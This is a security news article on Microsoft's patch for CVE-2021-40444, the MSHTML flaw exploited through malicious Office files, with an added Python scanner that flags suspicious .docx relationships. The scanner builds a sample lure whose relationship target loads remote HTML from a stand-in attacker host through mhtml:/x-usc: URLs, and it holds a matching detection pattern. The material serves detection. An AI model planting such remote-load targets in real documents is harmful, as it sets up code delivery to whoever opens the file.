[TheRecord] Microsoft patches Office zero-day in today’s Patch Tuesday

Microsoft has released patches today for a zero-day vulnerability in a Windows component that was abused in the wild in attacks using weaponized Office documents.

First disclosed last week, when Microsoft warned of the attacks and published basic mitigations, the bug now has official fixes, released today as part of the company's monthly Patch Tuesday security updates.

Tracked as CVE-2021-40444, the vulnerability has patches available for Windows versions as far back as Windows 7 and Windows Server 2008.

The bug resides in the Microsoft MSHTML component, also known as Trident, the rendering engine of the old Internet Explorer browser, which Office documents can still invoke to render web content. Microsoft said it discovered instances where a threat actor had created malicious Office files that used the MSHTML component to load web-based content inside the documents, such as a malicious ActiveX control, which exploited CVE-2021-40444 to run code on the underlying Windows OS.
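The document-side half of that chain, an Office package whose OLE object relationship points at a remote resource through an mhtml: or x-usc: URL, is something a defender can look for without ever opening the file in Word. The scanner below is an added example written for this page, not code from The Record or from Microsoft. The attacker.example URL and the in-memory .docx it builds are constructed samples, and the severity labels are this example's own convention.

```python
"""Scan an Office Open XML package for relationships that would make Word
pull remote content through MSHTML (mhtml:/x-usc: targets) or load an
external OLE object. Added example; the sample document is constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
IMAGE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                  "relationships/image")
# "mhtml:" at the start of a target, or "x-usc:" after the "!" separator that
# MHTML uses to nest a second URL, both hand MSHTML a web resource to fetch.
MSHTML_SCHEME = re.compile(r"(?:^|!)\s*(mhtml|x-usc):", re.IGNORECASE)

CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    "</Types>"
)


def find_suspicious_rels(docx_bytes):
    """Return one finding per relationship (in any .rels part) that either
    carries an mhtml:/x-usc: target (high) or is an external OLE object
    link (medium; legitimate linked objects exist but are rare)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed part; out of scope for this check
            for rel in root.iter("{%s}Relationship" % REL_NS):
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "")
                external = rel.get("TargetMode", "").lower() == "external"
                if MSHTML_SCHEME.search(target):
                    severity = "high"
                elif external and rel_type == OLE_REL_TYPE:
                    severity = "medium"
                else:
                    continue
                findings.append({
                    "part": name,
                    "id": rel.get("Id", ""),
                    "type": rel_type.rsplit("/", 1)[-1],
                    "target": target,
                    "severity": severity,
                })
    return findings


def build_sample_docx(target, rel_type=OLE_REL_TYPE, external=True):
    """Build a minimal .docx-shaped zip in memory (constructed sample, not a
    real lure) whose document.xml.rels holds a single relationship."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f"<Relationship Id=\"rId5\" Type={quoteattr(rel_type)} "
        f"Target={quoteattr(target)}{mode}/>"
        "</Relationships>"
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>constructed sample</w:t></w:r></w:p></w:body>"
        "</w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed lure: remote HTML reached via mhtml: with a nested x-usc: URL.
    lure = build_sample_docx(
        "mhtml:http://attacker.example/word.html!x-usc:http://attacker.example/word.html")
    for hit in find_suspicious_rels(lure):
        print(hit)
    # Ordinary embedded image: no finding expected.
    print(find_suspicious_rels(
        build_sample_docx("media/image1.png", IMAGE_REL_TYPE, external=False)))
```

Run it over a directory of .docx/.xlsx/.pptx files by feeding each file's bytes to find_suspicious_rels; the check reads only the package relationships, so it is safe to run on untrusted samples. A medium finding on a plain external OLE link is worth a look but is not by itself evidence of this bug.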

A successful attack allowed threat actors to gain control over a user’s OS, Microsoft said last week.

While no technical details were revealed last week, security researchers and malware developers quickly worked out what the issue was. Proof-of-concept exploit code eventually surfaced on both GitHub and underground hacking forums, and it has already been weaponized and integrated into attacks spotted this week.

A campaign with it today targeting Russian telcos…

— alex lanstein (@alex_lanstein) September 13, 2021

Fortunately, today's Office zero-day patch comes just in time: several security researchers found ways last week to bypass Microsoft's temporary mitigations [12], which left Windows users fully exposed to these attacks without any protection.

However, whether the patches hold up remains to be seen. Several security researchers have publicly stated that the bug is buried deep enough in core Office behavior that attackers could easily find new ways to abuse it, creating a scenario similar to Microsoft's never-ending PrintNightmare patching conundrum.

The September 2021 Patch Tuesday also fixes 85 other bugs

But besides the fix for CVE-2021-40444, Microsoft has also released other security updates today, with patches for 85 other bugs, 48 of which are Edge/Chromium-related issues.

Of these, the most important appears to be CVE-2021-36968, an elevation-of-privilege bug in the Windows DNS service, for which details have been publicly shared on the internet.

“According to Microsoft, it is not being exploited in the wild,” said Allan Liska, threat intelligence analyst at Recorded Future. “It is labelled Important by Microsoft and, interestingly, only impacts Windows 7 and Windows Server 2008.”

Other issues to keep an eye on, and reasons to apply today’s patches as soon as possible, are CVE-2021-36965 and CVE-2021-26435, Liska said.

The post Microsoft patches Office zero-day in today’s Patch Tuesday appeared first on The Record by Recorded Future.


You might be interested in …

[ThreatPost] Peloton Bike+ Bug Gives Hackers Complete Control


An attacker with initial physical access (say, at a gym) could gain root entry to the interactive tablet, making for a bevy of remote attack scenarios.


[BleepingComputer] Attackers scan for unpatched VMware vCenter servers, PoC exploit available

Threat actors are actively scanning for Internet-exposed VMware vCenter servers unpatched against a critical remote code execution (RCE) vulnerability impacting all vCenter deployments and patched by VMware ten days ago. […]


[HackerNews] Mozi IoT Botnet Now Also Targets Netgear, Huawei, and ZTE Network Gateways


Mozi, a peer-to-peer (P2P) botnet known to target IoT devices, has gained new capabilities that allow it to achieve persistence on network gateways manufactured by Netgear, Huawei, and ZTE, according to new findings. “Network gateways are a particularly juicy target for adversaries because they are ideal as initial access points to corporate networks,” researchers at […]
